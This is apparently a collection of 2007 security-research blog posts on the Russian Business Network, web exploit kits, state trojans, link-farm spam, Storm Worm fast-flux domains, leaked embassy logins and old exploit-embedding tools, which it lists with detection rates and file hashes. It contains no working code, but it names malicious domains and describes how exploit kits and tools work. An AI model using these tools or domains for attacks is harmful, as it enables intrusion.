"When VeriSign managed to hack into the RBN computer running the scam, it found accumulated data representing 30,000 such infections. “Every major trojan in the last year links to RBN” says a VeriSign sleuth."

Unethical penetration testing of malicious hosts to assess the damages by the malware campaign in question wouldn't result in the malware authors striking back with legal complaints, instead, they'll forward some DDoS bandwidth back at the investigating IPs, a consequence I'm sure researchers reading here have experienced before. On the other hand, the RBN themselves are getting more malicious with every new campaign, just consider for instance that Russian Business Network's IPs were behind the Massive Embedded Web Attack in Italy that took place in June, 2007, and the most recent Bank of India breach as well.

Popular Web Malware Exploitation Techniques

Who needs zero day vulnerabilities to achieve a widescale malware infection these days? Obviously the lack of this popular in the past prerequisite for a successful client side vulnerability exploitation, is no longer needed, but how come? Rather simple and that's the disturbing part - malicious parties stopped falling victims into the common perception that the end user is so fully patched, that zero day vulnerabilities are needed to break thought his thought to be complex use of security measures, instead, whether an event-study or plain simple common sense on their part, they've realized that an unpatched and obfuscated vulnerability is just as dangerous as a zero day, and the results have been evident ever since.

Going through the screenshots of the infected population of a certain malware kit, you can clearly see the diversity of the outdated vulnerabilities used. Multi-browser vulnerabilities IFRAME-ed all-in-one to achive the highest possible efficiency rate as there's a slight chance a visitor will return to a site they've managed to embedd the malware at, twice. The success of the these kits therefore has nothing to do with malicious innovations, but rather a successful tactical warfare against reactive security response. If perimeter defense cannot be breached, it will get either ignored or bypassed, precisely why client side vulnerabilities are back in the game with full speed.

Evidence showcasing this KISS (Keep it Simple Stupid) principle :

- IcePack, MPack, WebAttacker, the Nuclear Malware Kit, and pretty much every popular malware kit is taking advantage of outdated vulnerabilities, whether obfuscated or not depends on the pack's version and the malicious party's understanding of the concept

- The Massive Embedded Web Attack in Italy was using MPack's outdated arsenal of obfuscated vulnerabilities and despite that it achieved its objectives and infected thousands of hosts

- The recent Bank of India breach was using a modified version of the popular malware kits mentioned above, in between syndicating the hack with another campaign using a multi-IFRAME-ing techniques, again taking advantage of outdated vulnerabilities

- Storm Worm's success is mostly due to the fact that the end user is still living in the "malicious attachment" world, and so outdated vulnerabilities are again successfully used again her

Exploit Prevention Labs's recent stats on common vulnerabilities used as an infection vector can come very handy in terms of demonstrating the mass use of these malware kits. The bottom line is that their modularity combined with features and add-ons for them available either though a purchase or on demand, is an emerging trend by itself, one whether you cannot tell is it a script kiddie or sophisticated malicious party you're dealing with. And even if it's the second, the KISS principle has its own ugly applicability in the malware world.

Thursday, September 06, 2007

Infecting Terrorist Suspects with Malware

As we've already seen in the past, cyber jihadists, thus wannabe terrorists, use commercial anti virus, anti spyware and anonymity software. Therefore, if law enforcement starts benchmarking its creations against the most popular anti virus software, and purchasing private malware crypters to obfuscate the binaries, who would security vendors be protecting you from - law enforcement, or Yuri and Andrei, the fictional characters of two botnet masters? The practice is nothing new when it comes to intelligence gathering and the concept of OSINT through malware for instance. What's new is its applicability to law enforcement, which in a combination with bureaucracy could mean a law in a typical Chinese anti-censorship enforcement, that would oblige security vendors in the coutry to ignore the malware if they want to continue doing business there. Could we perhaps also witness a collective bargaining effort from security vendors not to do this, given the interest of using malware against potential suspects, a largely open topic by itself? Germany floats Trojan for terror suspects :

"Would-be terrorists need only use Ubuntu Linux to avoid the ploy. And even if they stuck with Windows their anti-virus software might detect the malware. Anti-virus firms that accede to law enforcement demands to turn a blind eye to state-sanctioned malware risk undermining trust in their software, as similar experience in the US has shown. Once the malware gets into circulation there's no guarantee it won't be turned against innocent users. The whole concept is loaded with irony. For one thing, German government computers, like those in the UK before them, are currently under targeted Trojan assault."

Targeted mailings to potential terrorists wouldn't work as effective as embedding IFRAMES within the cyber jihadist communities, and in the future, we may also see anti-terrorist malware kits courtesy of an unknown government that's purchasing or bidding for zero day browser vulnerabilities or anti virus software ones, in order to infect potential terrorists by bypassing their security solutions in place.

Wednesday, September 05, 2007

Examples of Search Engine Spam

Perhaps I should say an example of a 50/50 black hat SEO, as Google's not listing the first, but has already crawled the second -cashhomes.info/content ; mydream-condos.info/content. While assesing the first link farm I found out that on average, 263 pages have exactly 6411 outside links in them, 24.3 links per page. Pretty much the same case with the second one. Owning hundreds of domains like these and feeding them with garbage content in between syndicating ads can undermine a search engine's credibility if the black hat SEO operation starts appearing at the top results, and as we've already seen, both black hat SEO and paid keywords advertising can lead to malware embedded sites.

Storm Worm's Fast Flux Networks

Following my previous posts on "Storm Worm Malware Back in the Game" and "Storm Worm's use of Dropped Domains", here are some handy graphs of Storm Worm's use of fast-flux networks generated during the last several hours, acting as great examples of how diverse malware C&C has become.

- bnably.com

Domain servers in listed order:
ns13.bnably.com
ns12.bnably.com
ns11.bnably.com
ns10.bnably.com
ns9.bnably.com
ns8.bnably.com
ns7.bnably.com
ns6.bnably.com
ns5.bnably.com
ns4.bnably.com
ns3.bnably.com
ns2.bnably.com


- wxtaste.com

Domain servers in listed order:
ns13.wxtaste.com
ns12.wxtaste.com
ns11.wxtaste.com
ns10.wxtaste.com
ns9.wxtaste.com
ns8.wxtaste.com
ns7.wxtaste.com
ns6.wxtaste.com
ns5.wxtaste.com
ns4.wxtaste.com
ns3.wxtaste.com
ns2.wxtaste.com


- snbane.com

Domain servers in listed order:
ns13.snbane.com
ns12.snbane.com
ns11.snbane.com
ns10.snbane.com
ns9.snbane.com
ns8.snbane.com
ns7.snbane.com
ns6.snbane.com
ns5.snbane.com
ns4.snbane.com
ns3.snbane.com
ns2.snbane.com

- tibeam.com
Domain servers in listed order:
ns13.tibeam.com
ns12.tibeam.com
ns11.tibeam.com
ns10.tibeam.com
ns9.tibeam.com
ns8.tibeam.com
ns7.tibeam.com
ns6.tibeam.com
ns5.tibeam.com
ns4.tibeam.com
ns3.tibeam.com
ns2.tibeam.com


- eqcorn.com

Domain servers in listed order:
ns10.eqcorn.com
ns11.eqcorn.com
ns12.eqcorn.com
ns13.eqcorn.com
ns2.eqcorn.com
ns3.eqcorn.com
ns4.eqcorn.com
ns5.eqcorn.com
ns6.eqcorn.com
ns7.eqcorn.com
ns8.eqcorn.com
ns9.eqcorn.com

The Honeynet Project & Research Alliance defines a fast-flux network as :

"Fast-flux service networks are a network of compromised computer systems with public DNS records that are constantly changing, in some cases every few minutes. These constantly changing architectures make it much more difficult to track down criminal activities and shut down their operations."

In Storm Worm's case, we have an example of fast-fluxing dropped domains, and if you research a little further, you'll see that newly infected Storm Worm hosts shown in this particular moment of the fast-flux are already sending out spam.

Tuesday, September 04, 2007

Login Details for Foreign Embassies in the Wild

Login details for international embassies have been in the wild since August 30th in a full disclosure style :

"Here is a list with working passwords to exactly 100 email-accounts to Embassies and Governments around the world. Yes it’s the real deal and still working when we are posting this. So why in the world would anyone publish this kind of information? Because seriously, I’m not going to call the president of Iran and tell him that I got access to all their embassies. I’m DEranged, not suicidal! He has bombs and stuff…"

The researcher's main motivation behind releasing these is that there's no point in contacting the email owners directly as no one would take his emails seriously enought and change them, so by going full disclosure it would prompt the embassies in question to change the passwords. Dan Egerstad may be quite right, at least on the passwords changing issue. Could these email accounts be accessed globally and if yes why? For instance, could Uzbekistan's embassy in London successfully login into Uzbekistan's embassy in Moscow, and even worse, could a host not belonging to the embassy's network access these mailboxes for flexibility? If yes, there're way too many ways this data could have been obtained. While going through the accounting data, we could both confirm that best practices for strong passwords are place at some embassies, and also question the lack of such best practices at certain ones, a security measure that works against brute forcing attempts, but is totally irrelevant when it comes to keylogging and sniffing.

Many people would logically consider the possibility of abusing these login details by obtaining the content of the mailboxes. However, another perspective worth keeping in mind is the use of this login data as the foundation for targeted attacks on a embassy-to-embassy basis, the way we've seen it happen before.

DIY Exploits Embedding Tools - a Retrospective

Great analysis by the Spywareguide folks -- Chris Boyd and Peter Jayaraj in this assessment -- especially my deja vu moment with the King's IE Exploiter tool which I intented to cover in an upcoming post, in a combination with a brief retrospective of exploit and malware embedding tools that were empowering entire generations of script kiddies during the last couple of years. These tools are a great example of what the DIY trend used to look like before malicious economies of scale were embraced in the form of today's modular and efficiency-centered malware kits we're aware of.

-- The IE Exploiter v1.0/2.0

The tool is first know to have emerged back in 2002, with its latest version released in 2004. It was first branded as the "Fearless IE Exploiter" and then returned back to it's original name. Description of the v1.0 : "Fearless IE Exploiter allows you to embed executable files into HTML documents, that when viewed in an unpatched version of Internet Explorer 5.* will automatically download and execute the .exe". And the description of v2.0 : "IE Exploiter v2 is a very simple tool that creates a HTML file with an embedded executable file. Once the HTML file is viewed the executable file will overwrite notepad.exe on the target system and then execute it using the view-source: prefix."

Result: 22/32 (68.75%)
File size: 149359 bytes
MD5: 315cd35aa5a0334697832e83fac7b0dc
SHA1: 71a7929f7781d969a63e532cd8cd877940a2ca12

-- King's IE Exploiter

King's IE Exploiter is an Arabic DIY exploit embedding tool released around 2004. Despite that the malware embedded sites generated on-the-fly come totally unobfuscated, we will yet wait and see the eventual release of such feature.

Result: 6/32 (18.75%)
File size
: 253440 bytes
MD5: e6052d3abf95429fd761feef0a695470
SHA1: 9f91e21bf9e8898a09c36b31bb1f5afff3cb8f35

-- Zephyrus

Again relased around 2004, the description reads : "Its a prove of concept tool to generate a Stench MediaPlayer Exploit file more infos about stench can be found here http://malware.com or at here AVP calls it exploit.win32.zephyrus"

Result: 30/32 (93.75%)

-- God's Will

The description reads : "A GODMESSAGE page is an HTML page that works with an ACTIVEX bug founded in IE5.5/OUTLOOK/OUTLOOK EXPRESS. Thanks to this bug when someone view our godmessaged page he downloads an HTA file in his STARTUP FOLDER.'

Result: 32/32 (100%)

-- Ed Html Infector

The description of the tool circa 2004 reads : "Ed HTML Infector is a very simple tool that creates HTML file with an embedded executable file within."

Result: 14/32 (43.75%)
File size: 118784 bytes
MD5: 94c642903318f89d410c64d46f2047aa
SHA1: b834cd34283e541dccb5aad81fb49ca97adbb48c